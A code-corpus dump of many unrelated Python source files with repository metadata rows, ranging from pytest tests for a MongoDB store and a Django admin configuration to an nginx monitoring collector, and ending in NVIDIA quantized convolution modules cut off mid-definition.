lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Unknown):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Unknown):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
] | |
9a3dff4505416c7621031482886acde695f4199e | bb00a3876ddb49dcea2cdc4bbd2356359260a563 | /poptimizer/evolve/tests/test_store.py | d20ee06f325caec712a7a86b4cc74674f8863523 | [
"Unlicense"
] | permissive | hraffiest/poptimizer | 1d2975acd0ecbe8466a7a1aa1bf631d12b4c9854 | 16bc9e056a6daa452d48cdac0dea5901e4a3d4a1 | refs/heads/master | 2023-04-21T02:29:06.259420 | 2021-05-05T14:33:03 | 2021-05-05T14:33:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,176 | py | from types import SimpleNamespace
import bson
import pymongo
import pytest
from poptimizer.evolve import store
@pytest.fixture(scope="module", autouse=True)
def set_test_collection():
# noinspection PyProtectedMember
saved_collection = store._COLLECTION
test_collection = saved_collection.database["test"]
store._COLLECTION = test_collection
yield
store._COLLECTION = saved_collection
test_collection.drop()
def test_get_collection():
collection = store.get_collection()
assert isinstance(collection, pymongo.collection.Collection)
assert collection.name == "test"
@pytest.fixture(scope="class", name="field_instance")
def make_field_and_instance():
field = store.BaseField()
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestBaseField:
def test_set_name_index(self):
field = store.BaseField(index=True)
field.__set_name__(SimpleNamespace, "some")
assert field._name == store.ID
def test_set_name(self, field_instance):
field, _ = field_instance
field.__set_name__(SimpleNamespace, "some")
assert field._name == "some"
def test_get_raise(self, field_instance):
field, instance = field_instance
with pytest.raises(AttributeError) as error:
field.__get__(instance, SimpleNamespace)
assert "'SimpleNamespace' object has no attribute 'some'" in str(error.value)
def test_set(self, field_instance):
field, instance = field_instance
field.__set__(instance, 42)
assert hasattr(instance, "some")
assert instance.some == 42
assert len(instance._update) == 1
assert instance._update["some"] == 42
def test_get(self, field_instance):
field, instance = field_instance
assert field.__get__(instance, SimpleNamespace) == 42
@pytest.fixture(scope="class", name="default_field_instance")
def make_default_field_and_instance():
field = store.DefaultField(53)
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestDefaultField:
def test_unset_get(self, default_field_instance):
field, instance = default_field_instance
assert field.__get__(instance, SimpleNamespace) == 53
def test_set_get(self, default_field_instance):
field, instance = default_field_instance
field.__set__(instance, 64)
assert field.__get__(instance, SimpleNamespace) == 64
@pytest.fixture(scope="class", name="genotype_field_instance")
def make_genotype_field_and_instance():
field = store.GenotypeField()
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestGenotypeField:
def test_set_not_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
field.__set__(instance, None)
rez = field.__get__(instance, SimpleNamespace)
assert isinstance(rez, store.Genotype)
assert isinstance(instance.some, store.Genotype)
assert rez is instance.some
def test_set_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
genotype = store.Genotype(None)
field.__set__(instance, genotype)
assert genotype is field.__get__(instance, SimpleNamespace)
assert genotype is instance.some
class TestDoc:
def test_new_doc_and_save(self):
assert store.get_collection().count_documents({}) == 0
genotype = store.Genotype()
doc = store.Doc(genotype=genotype)
assert store.get_collection().count_documents({}) == 0
assert len(doc._update) == 2
assert isinstance(doc.id, bson.ObjectId)
assert doc.genotype is genotype
assert doc.wins == 0
assert doc.model is None
with pytest.raises(AttributeError) as error:
isinstance(doc.llh, bson.ObjectId)
assert "object has no attribute 'llh'" in str(error.value)
assert doc.date is None
assert doc.timer == 0
assert doc.tickers is None
doc.save()
assert store.get_collection().count_documents({}) == 1
assert len(doc._update) == 0
def test_load_wrong_doc(self):
id_ = bson.ObjectId()
with pytest.raises(store.IdError) as error:
store.Doc(id_=id_)
assert str(id_) in str(error.value)
def test_load_doc(self):
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
assert len(doc._update) == 0
assert doc.id == db_doc[store.ID]
assert doc.genotype == db_doc["genotype"]
assert doc.wins == 0
assert doc.model is None
with pytest.raises(AttributeError) as error:
isinstance(doc.llh, bson.ObjectId)
assert "object has no attribute 'llh'" in str(error.value)
assert doc.date is None
assert doc.timer == 0
assert doc.tickers is None
def test_load_doc_update_and_save(self):
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
assert len(doc._update) == 0
doc.wins = 42
doc.llh = 2.2
doc.timer = 111
assert len(doc._update) == 3
doc.save()
assert len(doc._update) == 0
doc_loaded = store.Doc(id_=db_doc[store.ID])
assert len(doc_loaded._update) == 0
assert doc_loaded.id == db_doc[store.ID]
assert doc_loaded.genotype == db_doc["genotype"]
assert doc_loaded.wins == 42
assert doc_loaded.model is None
assert doc_loaded.llh == 2.2
assert doc_loaded.date is None
assert doc_loaded.timer == 111
assert doc_loaded.tickers is None
def test_delete(self):
assert store.get_collection().count_documents({}) == 1
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
doc.delete()
assert store.get_collection().count_documents({}) == 0
| [
"[email protected]"
] | |
ee7a30ed534036c38ac71e4aa8e959f2c127a862 | 251651b763c2588a0a6b65d8b23d93b195a91788 | /virtual/bin/gunicorn | 0b628ba141f066067c63f04acb73acfb5b4b36dc | [
"MIT"
] | permissive | AugustineOchieng/studio | b0f6feb14f7f3e1f65644bffbee9d2c3fe805c8f | ee7fb55fd2ad7046414a68872af98361719af42b | refs/heads/master | 2020-05-21T08:21:07.033975 | 2019-05-15T10:14:45 | 2019-05-15T10:14:45 | 185,977,336 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/home/moringa/Desktop/studio/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"[email protected]"
] | ||
3f86754056689d08a519f2a79797332c97fa1366 | fcb94b0575d55b246a4e78dfec2610c9aceb836e | /tests/test_code/py/import_paths/abra.py | 046a90a0eb69f363cdbdc9eb6c947ebc79278f71 | [
"LGPL-2.0-or-later",
"MIT"
] | permissive | sarvex/code2flow | 1504fb0537ea17f486013e67958b4e17551f3a02 | 77375b90a09abd4b4d38167737d02ff4737a52aa | refs/heads/main | 2023-06-10T03:24:18.935595 | 2023-05-30T23:52:11 | 2023-05-30T23:52:11 | 33,498,323 | 0 | 0 | MIT | 2023-05-30T23:52:12 | 2015-04-06T18:33:55 | Python | UTF-8 | Python | false | false | 19 | py | def abra2():
pass
| [
"[email protected]"
] | |
6c917765f0811b156ddda90eac4c87e9f06185f7 | f98c9dea0e212be5c7bc3161499e5633383bd4d7 | /python/fruit_package_module_test.py | c82839cdcdd29c508d4f8791380d7717c7237b7c | [
"MIT"
] | permissive | ysoftman/test_code | dddb5bee3420977bfa335320a09d66e5984403f5 | 0bf6307073081eeb1d654a1eb5efde44a0bdfe1e | refs/heads/master | 2023-08-17T05:45:49.716829 | 2023-08-16T05:00:09 | 2023-08-16T05:00:09 | 108,200,568 | 4 | 0 | MIT | 2023-03-15T04:23:10 | 2017-10-25T00:49:26 | C++ | UTF-8 | Python | false | false | 509 | py | # 패키지(모듈이 모인 디렉토리)가 이닌 모듈이 같은 경로에 있는 경우
# import fruite_module as fm
# alias 로 패키지.모듈 사용하기
import fruite_package.fruit_module as fm
fm.fruit.apple(100)
fm.fruit.lemon("2000")
# 패키지.모듈 전체 사용하기
from fruite_package.fruit_module import *
fruit.apple(100)
# 패키지.모듈 중 fruit 클래스를 fr 이름으로 사용
from fruite_package.fruit_module import fruit as fr
fr.lemon(200)
fr.apple(50)
fr.orange(100)
| [
"[email protected]"
] | |
22cff3945dd868a9c060382d1020722c7a4d2eea | 4a08ae605a8f96146b14881330d21317a67e225d | /data_types/question17.py | a245b912a288e46b12cce2f9783bf7dbe0c76b56 | [] | no_license | alex1the1great/Assignment | dd6083a2196d9bae36bb66bf12a2bdc07a0b93e8 | 5a806668c3bfc0d9750421c4ae287f19cbf36fc7 | refs/heads/master | 2022-11-13T11:07:13.875607 | 2020-06-29T03:51:17 | 2020-06-29T03:51:17 | 275,724,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 361 | py | import re
print('Example: 1 2 3 4 5')
numbers = input('Enter list of numbers separate with space:')
pattern = r'^[0-9\s]+$'
check_multi = re.findall(pattern, numbers)
if not check_multi:
print('Please enter valid format')
else:
total = numbers.split(' ')
product = 1
for i in total:
i = int(i)
product *= i
print(product)
| [
"[email protected]"
] | |
06c23408811bd37ee1ea076d37ef63244b96f858 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_155/945.py | a43e4458d2b1f38b912356b2ce0d2242713cfb2c | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | def nombre_ami(b):
debout = 0
ami = 0
compteur = 0
ami_en_plus = 0
for chiffre in b:
if compteur > debout:
ami_en_plus = (compteur - debout)
ami += ami_en_plus
debout += ami_en_plus
debout += int(chiffre)
compteur += 1
return str(ami)
def solution_jam1():
source = open("D:/Download/test.txt","r")
output = open("D:/Download/jam1long.txt","w")
liste = source.readline()
liste = liste.split('\n')
for i in range(int(liste[0])):
liste = source.readline()
liste = liste.split()
output.write('Case #'+str(i+1)+': '+nombre_ami(liste[1])+'\n')
output.close()
source.close()
solution_jam1()
| [
"[email protected]"
] | |
e00d864ccd59cb04d2832d0d8da60884622e3044 | b2de5660d81afdf6b1fba058faee6ece6a51e462 | /amplify/agent/collectors/plus/upstream.py | ebd305b92eb648c9fd3ca9fc2b1bc0b84eb905e5 | [
"BSD-2-Clause"
] | permissive | Ferrisbane/nginx-amplify-agent | 725d8a7da7fb66e0b41cddd8139d25a084570592 | ef769934341374d4b6ede5fcf5ebff34f6cba8de | refs/heads/master | 2021-01-22T00:03:49.686169 | 2016-07-20T17:50:30 | 2016-07-20T17:50:30 | 63,801,713 | 0 | 0 | null | 2016-07-20T17:41:25 | 2016-07-20T17:41:25 | null | UTF-8 | Python | false | false | 3,982 | py | # -*- coding: utf-8 -*-
from amplify.agent.collectors.plus.util import upstream
from amplify.agent.common.context import context
from amplify.agent.collectors.plus.abstract import PlusStatusCollector
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__credits__ = ["Mike Belov", "Andrei Belov", "Ivan Poluyanov", "Oleg Mamontov", "Andrew Alexeev", "Grant Hulegaard", "Arie van Luttikhuizen"]
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "[email protected]"
class UpstreamCollector(PlusStatusCollector):
short_name = 'plus_upstream'
def collect(self):
try:
tuples = self.gather_data()
for data, stamp in tuples:
# workaround for supporting old N+ format
# http://nginx.org/en/docs/http/ngx_http_status_module.html#compatibility
peers = data['peers'] if 'peers' in data else data
for peer in peers:
# This loop will aggregate all peer metrics as a single "upstream" entity.
for method in (
self.active_connections,
self.upstream_request,
self.upstream_header_time,
self.upstream_response_time,
self.upstream_responses,
self.upstream_bytes,
self.upstream_fails,
self.upstream_health_checks,
self.upstream_queue,
self.upstream_peer_count
):
try:
method(peer, stamp)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream peer metrics %s due to %s' %
(method.__name__, exception_name)
)
context.log.debug('additional info:', exc_info=True)
try:
self.increment_counters()
self.finalize_latest()
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to increment n+ upstream counters due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream metrics due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
def active_connections(self, data, stamp):
upstream.collect_active_connections(self, data, stamp)
def upstream_request(self, data, stamp):
upstream.collect_upstream_request(self, data, stamp)
def upstream_header_time(self, data, stamp):
upstream.collect_upstream_header_time(self, data, stamp)
def upstream_response_time(self, data, stamp):
upstream.collect_upstream_response_time(self, data, stamp)
def upstream_responses(self, data, stamp):
upstream.collect_upstream_responses(self, data, stamp)
def upstream_bytes(self, data, stamp):
upstream.collect_upstream_bytes(self, data, stamp)
def upstream_fails(self, data, stamp):
upstream.collect_upstream_fails(self, data, stamp)
def upstream_health_checks(self, data, stamp):
upstream.collect_upstream_health_checks(self, data, stamp)
def upstream_queue(self, data, stamp):
upstream.collect_upstream_queue(self, data, stamp)
def upstream_peer_count(self, data, stamp):
upstream.collect_upstream_peer_count(self, data, stamp)
| [
"[email protected]"
] | |
b4cff199f29e741f20b31e5e5f92df6fd15d82ab | d200a54adcec3a254a909b9689f925c1614f6fb1 | /backend/core/admin.py | a526227756b4d1de8a88c8269f99a134351a5779 | [] | no_license | shusaku-ishikawa/binance | 1bbe7f4aaf32c0ade4f67da7a4c1972f414bfa19 | 60bad0848fa4f4666e2476117a79ee8452326ed1 | refs/heads/master | 2022-01-27T01:35:24.038917 | 2019-11-30T12:42:36 | 2019-11-30T12:42:36 | 204,909,653 | 0 | 1 | null | 2022-01-15T05:20:54 | 2019-08-28T10:50:13 | JavaScript | UTF-8 | Python | false | false | 2,304 | py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
from .models import *
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
from django.conf import settings
from django.utils.safestring import mark_safe
class MyUserChangeForm(UserChangeForm):
class Meta:
model = User
fields = '__all__'
class MyUserCreationForm(UserCreationForm):
class Meta:
model = User
fields = ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb' )
class MyUserAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password')}),
(_('Personal info'), {'fields': ()}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login',)}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email','api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password1', 'password2'),
}),
)
form = MyUserChangeForm
add_form = MyUserCreationForm
list_display = ('email', 'api_key','api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'is_staff',)
search_fields = ('email',)
ordering = ('email',)
class SymbolAdmin(admin.ModelAdmin):
#list_display = [field.name for field in Symbol._meta.get_fields()]
list_display = ['symbol', 'from_currency', 'to_currency', 'side']
class OrderSequenceAdmin(admin.ModelAdmin):
list_display = ['t1', 't2', 't3']
class OrderAdmin(admin.ModelAdmin):
list_display = ['symbol', 'order_id', 'quantity', 'quote_quantity', 'price', 'time', 'status']
class OrderSequenceResultAdmin(admin.ModelAdmin):
list_display = ['master', 't1_result', 't2_result', 't3_result', 'profit']
admin.site.register(User, MyUserAdmin)
admin.site.register(Symbol, SymbolAdmin)
admin.site.register(OrderSequence, OrderSequenceAdmin)
admin.site.register(Order, OrderAdmin)
admin.site.register(OrderSequenceResult, OrderSequenceResultAdmin) | [
"[email protected]"
] | |
4d5c0786be25e6910e4ce018e76c712744d39dae | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/74/usersdata/197/40006/submittedfiles/lecker.py | 2e27da6fdd494d21fc5e283193a357ccb803379a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | # -*- coding: utf-8 -*-
import math
a=int(input('Digite o valor do número a:'))
b=int(input('Digite o valor do número b:'))
c=int(input('Digite o valor do número c:'))
d=int(input('Digite o valor do número d:'))
if a>b and b<c and c>d:
print('N')
elif a==b==c==d:
print('N')
elif a<b and b>c and c<d:
print('N')
elif a>b and b<c and c<d:
print('N')
elif a==b==c>=d and a<b==c==d and a==b<c==d:
print('N')
else:
print('S') | [
"[email protected]"
] | |
a85eca58f0c19dea7674254798bcf77bb60ed9b8 | a882ccf759025735f926695d6a5a39937854646a | /e_step4/pygame00.py | a91f3f96979ff338f83cd1d55dc042ebde65d456 | [] | no_license | muzudho/practice-open-cv2 | 5c1534564bcf43c2d8f7a6fb4ee1583bd77337f9 | 55af5cfb37587b08123b404cf8768d83148cb046 | refs/heads/main | 2023-07-08T02:23:22.984816 | 2021-08-10T10:45:01 | 2021-08-10T10:45:01 | 349,864,518 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,820 | py | """coding: utf -8
"""
# モジュールの読み込み
import sys
import time
import pygame
from pygame.locals import QUIT
# pygame の初期化
pygame.init()
# 画像の読み込み
# FRAME_COUNT = 380
FRAME_COUNT = 528
#FRAME_COUNT = 960
# FRAME_COUNT = 4560
#FRAME_COUNT = 1520
FPS = 8 # 例えば 15 フレームで撮影するなら、ゲーム画面はその半分の FPS ならコマ飛びを感じないぐらい
IMAGE1 = pygame.image.load('./@share/out-cstep4-0.png')
IMAGE1_W = IMAGE1.get_width() # 画像の横幅の取得
IMAGE1_H = IMAGE1.get_height() # 画像の高さの取得
DISPLAY_SIZE = (IMAGE1_W, IMAGE1_H) # width, height
SURFACE = pygame.display.set_mode(DISPLAY_SIZE) # アプリケーションウィンドウ
pygame.display.set_caption('Application: pygame00.py')
CLOCK = pygame.time.Clock() # フレームレート制御のための Clock オブジェクト
# 画像の先読み
FRAMES = []
for i in range(0, FRAME_COUNT):
IMAGE1 = pygame.image.load(f'./@share/out-cstep4-{i}.png')
FRAMES.append(IMAGE1)
# メインループ
WHITE = (255, 255, 255)
TOP_LEFT_P = (0, 0) # x, y
for j in range(0, 1): # 1ループ # 2ループ
for i in range(0, FRAME_COUNT):
# SURFACE.fill(WHITE) # 背景の色
SURFACE.blit(FRAMES[i], TOP_LEFT_P) # ボールの描画
# イベントキューを処理するループ
for ev in pygame.event.get():
if ev.type == QUIT: # 「終了」イベント
pygame.quit()
print('quitting...')
sys.exit()
# ディスプレイの更新
pygame.display.update()
if j == 0 and i == 0:
time.sleep(3) # Seconds
# フレームレートの設定
CLOCK.tick(FPS) # fps を指定
time.sleep(3) # Seconds
| [
"[email protected]"
] | |
b85a75aeafda4547a9db1b598e1d8f93af10c136 | 3b628230666e2324b325d29ed8997a905dcba291 | /web/views/report.py | 17aff5f6356ae5632f81eedc4114595ae36f8fbe | [] | no_license | emohamed/obshtestvo.bg | 9f67734776ecdef5dfc5238a9caabd97c5e80cbd | b90c547a880294cc84956eb926413fb7118be133 | refs/heads/master | 2020-12-25T20:30:38.667603 | 2016-01-06T16:44:33 | 2016-01-06T16:46:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | from django.views.generic.base import View
from restful.decorators import restful_view_templates
@restful_view_templates
class ReportView(View):
def get(self, request):
return {
"page": "inner report",
}
| [
"[email protected]"
] | |
77bf3568089d84dca57ebccf21f5df9caf089b6b | c1a9436f38714277b063d76af47e8b9448d5cc73 | /CRO/Molecule.py | 25eaa41d932d1644507e279a2297edc8bc7924ea | [] | no_license | rakib06/LearnPythonBasic | 83f5bf5c63a40e8d5f93ac3ffa0d0443fdc0519a | fc0b81850e76d38c6816bd9fe81b442b68d6bd75 | refs/heads/master | 2020-09-01T01:03:49.087763 | 2019-12-25T23:11:09 | 2019-12-25T23:11:09 | 218,835,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | def spin_words(sentence):
my_list = sentence.split()
result = ''
for i in range(len(my_list)):
x = my_list[i]
if len(x) >= 5:
x = x[::-1]
if i != 0:
result = result + ' ' + x
else:
result += x
return result
s = 'rettel rettel Kata than in etirW than desrever the in gnirts gnirts'
def spin_word_kata(sentence):
return " ".join([x[::-1] if len(x)>=5 else x for x in sentence.split()])
print(spin_word_kata(s))
my_list = ['hello', 'how', 'are', 'you']
print(' '.join(my_list), end='\n')
print(' '.join([x[::-1] if x != 'you' else x for x in my_list])) | [
"[email protected]"
] | |
02c2c129135e6b8b655b6a7764566dd3e703f0b2 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_13280.py | 2846b517a21df83a34ad11137da1ded0a3e9d792 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 89 | py | # Django: Formset for adding captions to uploaded images
{{ form.instance.resized_img }}
| [
"[email protected]"
] | |
f19ffd2d0507b157f08f52ba3d59cf3a0d343ef3 | ca59d18e503ef22fbc920c6de48ffc8eac5a1443 | /tools/pytorch-quantization/pytorch_quantization/nn/modules/quant_conv.py | 9aaf19a265cb987212f13e71af3c256ce3cfe589 | [
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"ISC",
"MIT"
] | permissive | boh-inspur/TensorRT | 9fc0ae0ad4e31da040d10728b63d9dc284852b67 | e4d2f7f4406f1c8f4632cc67de33728cef90ca29 | refs/heads/master | 2023-04-13T21:24:13.912673 | 2021-04-23T09:55:18 | 2021-04-23T09:55:18 | 265,431,588 | 0 | 0 | Apache-2.0 | 2021-04-23T09:55:19 | 2020-05-20T02:49:58 | null | UTF-8 | Python | false | false | 16,356 | py | #
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Quantized convolution
Base code is from nn.Conv, details of Module and original argument can be found there.
Module names are intentionally kept same as unquantized version so that they can be dropped into preexisting model
easily, and load pretrained weight. Aliases with Quant prefix are defined and are encouraged to be used explicitly
when start scratch.
"""
import torch
import torch.nn
import torch.nn.functional as F
from torch.nn.modules.utils import _single, _pair, _triple
from torch.nn.modules.conv import _ConvTransposeNd
from pytorch_quantization import tensor_quant
from . import _utils
__all__ = [
"Conv2d", "QuantConv2d", "Conv3d", "QuantConv3d", "Conv1d", "QuantConv1d", "ConvTranspose1d", "ConvTranspose2d",
"ConvTranspose3d", "QuantConvTranspose1d", "QuantConvTranspose2d", "QuantConvTranspose3d"
]
class _QuantConvNd(torch.nn.modules.conv._ConvNd, _utils.QuantMixin):
"""base class of quantized Conv inherited from _ConvNd
Comments of original arguments can be found in torch.nn.modules.conv
Arguments:
quant_desc_input: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`.
Quantization descriptor of input.
quant_desc_weight: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`.
Quantization descriptor of weight.
Raises:
ValueError: If unsupported arguments are passed in.
Readonly properties:
- input_quantizer:
- weight_quantizer:
Static methods:
- set_default_quant_desc_input: Set default_quant_desc_input
- set_default_quant_desc_weight: Set default_quant_desc_weight
"""
default_quant_desc_input = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
def __init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, transposed, output_padding,
groups, bias, padding_mode, quant_desc_input, quant_desc_weight):
super(_QuantConvNd, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation,
transposed, output_padding, groups, bias, padding_mode)
self.init_quantizer(quant_desc_input, quant_desc_weight)
def _quant(self, input):
"""Apply quantization on input and weight
Function called by the classes lower in the hierarchy, which actually performs the quantization before forward
in the derivate class the particular Function.
Arguments:
input: in_features to quantize
Returns:
A tuple: (quant_in_feature, quant_weight)
"""
quant_input = self._input_quantizer(input)
quant_weight = self._weight_quantizer(self.weight)
return (quant_input, quant_weight)
class QuantConv2d(_QuantConvNd):
"""Quantized 2D conv"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONV2D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
bias=True,
padding_mode='zeros',
**kwargs):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConv2d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, False,
_pair(0), groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input):
# the actual quantization happens in the next level of the class hierarchy
quant_input, quant_weight = self._quant(input)
if self.padding_mode == 'circular':
expanded_padding = ((self.padding[1] + 1) // 2, self.padding[1] // 2,
(self.padding[0] + 1) // 2, self.padding[0] // 2)
output = F.conv2d(F.pad(quant_input, expanded_padding, mode='circular'),
quant_weight, self.bias, self.stride,
_pair(0), self.dilation, self.groups)
else:
output = F.conv2d(quant_input, quant_weight, self.bias, self.stride, self.padding, self.dilation,
self.groups)
return output
class QuantConv3d(_QuantConvNd):
"""Quantized 3D Conv"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONV3D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
bias=True,
padding_mode='zeros',
**kwargs):
kernel_size = _triple(kernel_size)
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConv3d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, False,
_triple(0), groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input):
# the actual quantization happens in the next level of the class hierarchy
quant_input, quant_weight = self._quant(input)
if self.padding_mode == 'circular':
expanded_padding = ((self.padding[2] + 1) // 2, self.padding[2] // 2,
(self.padding[1] + 1) // 2, self.padding[1] // 2,
(self.padding[0] + 1) // 2, self.padding[0] // 2)
output = F.conv3d(F.pad(quant_input, expanded_padding, mode='circular'),
quant_weight, self.bias, self.stride, _triple(0),
self.dilation, self.groups)
else:
output = F.conv3d(quant_input, quant_weight, self.bias, self.stride, self.padding, self.dilation,
self.groups)
return output
class QuantConv1d(_QuantConvNd):
"""Quantized 1D Conv"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONV1D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
bias=True,
padding_mode='zeros',
**kwargs):
kernel_size = _single(kernel_size)
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConv1d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, False,
_single(0), groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input):
# the actual quantization happens in the next level of the class hierarchy
quant_input, quant_weight = self._quant(input)
if self.padding_mode == 'circular':
expanded_padding = ((self.padding[0] + 1) // 2, self.padding[0] // 2)
output = F.conv1d(F.pad(quant_input, expanded_padding, mode='circular'),
quant_weight, self.bias, self.stride,
_single(0), self.dilation, self.groups)
else:
output = F.conv1d(quant_input, quant_weight, self.bias, self.stride,
self.padding, self.dilation, self.groups)
return output
class _QuantConvTransposeNd(torch.nn.modules.conv._ConvTransposeNd, _utils.QuantMixin):
"""base class of quantized Transposed Conv inherited from _ConvTransposeNd
Comments of original arguments can be found in torch.nn.modules.conv
Arguments:
quant_desc_input: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`.
Quantization descriptor of input.
quant_desc_weight: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`.
Quantization descriptor of weight.
Raises:
ValueError: If unsupported arguments are passed in.
Readonly properties:
- input_quantizer:
- weight_quantizer:
Static methods:
- set_default_quant_desc_input: Set default_quant_desc_input
- set_default_quant_desc_weight: Set default_quant_desc_weight
"""
default_quant_desc_input = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
def __init__(self, in_channels, out_channels, kernel_size, stride,
padding, dilation, transposed, output_padding,
